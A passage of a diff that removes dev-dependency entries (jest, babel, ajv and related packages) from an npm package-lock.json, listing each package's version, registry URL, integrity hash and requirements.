"https://registry.npmjs.org/form-data/-/form-data-2.5.1.tgz", - "integrity": "sha512-m21N3WOmEEURgk6B9GLOE4RuWOFf28Lhh9qGYeNlGq4VDXUlJy2th2slBNU8Gp8EzloYZOibZJ7t5ecIrFSjVA==", - "dev": true, - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - } - } - } - }, - "@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "@types/tough-cookie": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.1.tgz", - "integrity": "sha512-Y0K95ThC3esLEYD6ZuqNek29lNX2EM1qxV8y2FTLUB0ff5wWrk7az+mLrnNFUnaXcgKye22+sFBRXOgpPILZNg==", - "dev": true - }, - "@types/ws": { - "version": "8.5.4", - "resolved": "https://registry.npmjs.org/@types/ws/-/ws-8.5.4.tgz", - "integrity": "sha512-zdQDHKUgcX/zBc4GrwsE/7dVdAD8JR4EuiAXiiUhhfyIJXXb2+PrGshFyeXWQPMmmZ2XxgaqclgpIC7eTXc1mg==", - "dev": true, - "requires": { - "@types/node": "*" - } - }, - "@types/yargs": { - "version": "17.0.22", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.22.tgz", - "integrity": "sha512-pet5WJ9U8yPVRhkwuEIp5ktAeAqRZOq4UdAyWLWzxbtpyXnzbtLdKiXAjJzi/KLmPGS9wk86lUFWZFN6sISo4g==", - "dev": true, - "requires": { - "@types/yargs-parser": "*" - } - }, - "@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "dev": true, - "requires": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - } - }, - "ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "requires": { - "type-fest": "^0.21.3" - } - }, - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true - }, - "ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dev": true, - "requires": { - "color-convert": "^2.0.1" - } - }, - "anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "requires": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - } - }, - "argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "requires": { - "sprintf-js": "~1.0.2" - } - }, - "asn1": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", - "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", - "dev": true, - "requires": { - "safer-buffer": "~2.1.0" - } - }, - "assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=", - "dev": true - }, - "async": { - "version": "3.2.6", - "resolved": "https://registry.npmjs.org/async/-/async-3.2.6.tgz", - "integrity": "sha512-htCUDlxyyCLMgaM3xXg0C0LW2xqfuQ6p05pCEIsXuyQ+a1koYKTuBMzRNwmybfLgvJDMd0r1LTn4+E0Ti6C2AA==", - "dev": true - }, - "asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=", - "dev": true - }, - "aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha1-tG6JCTSpWR8tL2+G1+ap8bP+dqg=", - "dev": true - }, - "aws4": { - "version": "1.11.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.11.0.tgz", - "integrity": "sha512-xh1Rl34h6Fi1DC2WWKfxUTVqRsNnr6LsKz2+hfwDxQJWmrx8+c7ylaqBMcHfl1U1r2dsifOvKX3LQuLNZ+XSvA==", - "dev": true - }, - "babel-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.7.0.tgz", - "integrity": "sha512-BrvGY3xZSwEcCzKvKsCi2GgHqDqsYkOP4/by5xCgIwGXQxIEh+8ew3gmrE1y7XRR6LHZIj6yLYnUi/mm2KXKBg==", - "dev": true, - "requires": { - "@jest/transform": "^29.7.0", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.6.3", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - } - }, - "babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - } - }, - "babel-plugin-jest-hoist": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.6.3.tgz", - "integrity": "sha512-ESAc/RJvGTFEzRwOTT4+lNDk/GNHMkKbNzsvT0qKRfDyyYTskxB5rnU2njIDYVxXCBHHEI1c0YwHob3WaYujOg==", - "dev": true, - "requires": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - } - }, - "babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "requires": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - } - }, - "babel-preset-jest": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.6.3.tgz", - "integrity": "sha512-0B3bhxR6snWXJZtR/RliHTDPRgn1sNHOR0yVtq/IiQFyuOVjFS+wuio/R4gSNkyYmKmJB4wGZv2NZanmKmTnNA==", - "dev": true, - "requires": { - "babel-plugin-jest-hoist": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0" - } - }, - "balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha1-pDAdOJtqQ/m2f/PKEaP2Y342Dp4=", - "dev": true, - "requires": { - "tweetnacl": "^0.14.3" - } - }, - "brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "requires": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "braces": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.2.tgz", - "integrity": "sha512-b8um+L1RzM3WDSzvhm6gIz1yfTbBt6YTlcEKAvsmqCZZFw46z626lVj9j1yEPW33H5H+lBQpZMP1k8l+78Ha0A==", - "dev": true, - "requires": { - "fill-range": "^7.0.1" - } - }, - "browserslist": { - "version": "4.24.2", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.24.2.tgz", - "integrity": "sha512-ZIc+Q62revdMcqC6aChtW4jz3My3klmCO1fEmINZY/8J3EpBg5/A/D0AKmBveUh6pgoeycoMkVMko84tuYS+Gg==", - "dev": true, - "requires": { - "caniuse-lite": "^1.0.30001669", - "electron-to-chromium": "^1.5.41", - "node-releases": "^2.0.18", - "update-browserslist-db": "^1.1.1" - } - }, - "bs-logger": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/bs-logger/-/bs-logger-0.2.6.tgz", - "integrity": "sha512-pd8DCoxmbgc7hyPKOvxtqNcjYoOsABPQdcCUjGp3d42VR2CX1ORhk2A87oqqu5R1kk+76nsxZupkmyd+MVtCog==", - "dev": true, - "requires": { - "fast-json-stable-stringify": "2.x" - } - }, - "bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "requires": { - "node-int64": "^0.4.0" - } - }, - "buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha1-dBxSFkaOrcRXsDQQEYrXfejB3bE=", - "dev": true - }, - "callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true - }, - "camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true - }, - "caniuse-lite": { - "version": "1.0.30001680", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001680.tgz", - "integrity": "sha512-rPQy70G6AGUMnbwS1z6Xg+RkHYPAi18ihs47GH0jcxIG7wArmPgY3XbS2sRdBbxJljp3thdT8BIqv9ccCypiPA==", - "dev": true - }, - "caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha1-G2gcIf+EAzyCZUMJBolCDRhxUdw=", - "dev": true - }, - "chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "requires": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - } - }, - "char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true - }, - "chownr": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-2.0.0.tgz", - "integrity": "sha512-bIomtDF5KGpdogkLd9VspvFzk9KfpyyGlS8YFVZl7TGPBHL5snIOnxeshwVgPteQ9b4Eydl+pVbIyE1DcvCWgQ==", - "dev": true - }, - "ci-info": { - "version": "3.7.1", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.7.1.tgz", - "integrity": "sha512-4jYS4MOAaCIStSRwiuxc4B8MYhIe676yO1sYGzARnjXkWpmzZMMYxY6zu8WYWDhSuth5zhrQ1rhNSibyyvv4/w==", - "dev": true - }, - "cjs-module-lexer": { - "version": "1.4.1", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.4.1.tgz", - "integrity": "sha512-cuSVIHi9/9E/+821Qjdvngor+xpnlwnuwIyZOaLmHBVdXL+gP+I6QQB9VkO7RI77YIcTV+S1W9AreJ5eN63JBA==", - "dev": true - }, - "cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "requires": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - } - }, - "co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true - }, - "collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dev": true, - "requires": { - "color-name": "~1.1.4" - } - }, - "color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "dev": true, - "requires": { - "delayed-stream": "~1.0.0" - } - }, - "concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha1-2Klr13/Wjfd5OnMDajug1UBdR3s=", - "dev": true - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha1-tf1UIgqivFq1eqtxQMlAdUUDwac=", - "dev": true - }, - "create-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/create-jest/-/create-jest-29.7.0.tgz", - "integrity": "sha512-Adz2bdH0Vq3F53KEMJOoftQFutWCukm6J24wbPWRO4k1kMY7gS7ds/uoJkNuV8wDCtWWnuwGcJwpWcih+zEW1Q==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "prompts": "^2.0.1" - } - }, - "cross-spawn": { - "version": "7.0.6", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", - "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", - "dev": true, - "requires": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - } - }, - "dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha1-hTz6D3y+L+1d4gMmuN1YEDX24vA=", - "dev": true, - "requires": { - "assert-plus": "^1.0.0" - } - }, - "debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "requires": { - "ms": "2.1.2" - } - }, - "dedent": { - "version": "1.5.3", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-1.5.3.tgz", - "integrity": "sha512-NHQtfOOW68WD8lgypbLA5oT+Bt0xXJhiYvoR6SmmNXZfpzOGXwdKWmcwG8N7PwVVWV3eF/68nmD9BaJSsTBhyQ==", - "dev": true, - "requires": {} - }, - "deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true - }, - "delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=", - "dev": true - }, - "detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true - }, - "diff-sequences": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.6.3.tgz", - "integrity": "sha512-EjePK1srD3P08o2j4f0ExnylqRs5B9tJjcp9t1krH2qRi8CCdsYfwe9JgSLurFBWwq4uOlipzfk5fHNvwFKr8Q==", - "dev": true - }, - "ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha1-OoOpBOVDUyh4dMVkt1SThoSamMk=", - "dev": true, - "requires": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" - } - }, - "ejs": { - "version": "3.1.10", - "resolved": "https://registry.npmjs.org/ejs/-/ejs-3.1.10.tgz", - "integrity": "sha512-UeJmFfOrAQS8OJWPZ4qtgHyWExa088/MtK5UEyoJGFH67cDEXkZSviOiKRCZ4Xij0zxI3JECgYs3oKx+AizQBA==", - "dev": true, - "requires": { - "jake": "^10.8.5" - } - }, - "electron-to-chromium": { - "version": "1.5.63", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.63.tgz", - "integrity": "sha512-ddeXKuY9BHo/mw145axlyWjlJ1UBt4WK3AlvkT7W2AbqfRQoacVoRUCF6wL3uIx/8wT9oLKXzI+rFqHHscByaA==", - "dev": true - }, - "emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "requires": { - "is-arrayish": "^0.2.1" - } - }, - "escalade": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz", - "integrity": "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==", - "dev": true - }, - "escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true - }, - "esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true - }, - "execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "requires": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - } - }, - "exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true - }, - "expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-2Zks0hf1VLFYI1kbh0I5jP3KHHyCHpkfyHBzsSXRFgl/Bg9mWYfMW8oD+PdMPlEwy5HNsR9JutYy6pMeOh61nw==", - "dev": true, - "requires": { - "@jest/expect-utils": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0" - } - }, - "extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==", - "dev": true - }, - "extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha1-lpGEQOMEGnpBT4xS48V06zw+HgU=", - "dev": true - }, - "fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==", - "dev": true - }, - "fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", - "dev": true - }, - "fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "requires": { - "bser": "2.1.1" - } - }, - "filelist": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/filelist/-/filelist-1.0.4.tgz", - "integrity": "sha512-w1cEuf3S+DrLCQL7ET6kz+gmlJdbq9J7yXCSjK/OZCPA+qEN1WyF4ZAf0YYJa4/shHJra2t/d/r8SV4Ji+x+8Q==", - "dev": true, - "requires": { - "minimatch": "^5.0.1" - }, - "dependencies": { - "brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", - "dev": true, - "requires": { - "balanced-match": "^1.0.0" - } - }, - "minimatch": { - "version": "5.1.6", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.6.tgz", - "integrity": "sha512-lKwV/1brpG6mBUFHtb7NUmtABCb2WZZmm2wNiOA5hAb8VdCS4B3dtMWyvcoViccwAW/COERjXLt0zP1zXUN26g==", - "dev": true, - "requires": { - "brace-expansion": "^2.0.1" - } - } - } - }, - "fill-range": { - "version": "7.0.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.0.1.tgz", - "integrity": "sha512-qOo9F+dMUmC2Lcb4BbVvnKJxTPjCm+RRpe4gDuGrzkL7mEVl/djYSu2OdQ2Pa302N4oqkSg9ir6jaLWJ2USVpQ==", - "dev": true, - "requires": { - "to-regex-range": "^5.0.1" - } - }, - "find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "requires": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - } - }, - "forever-agent": 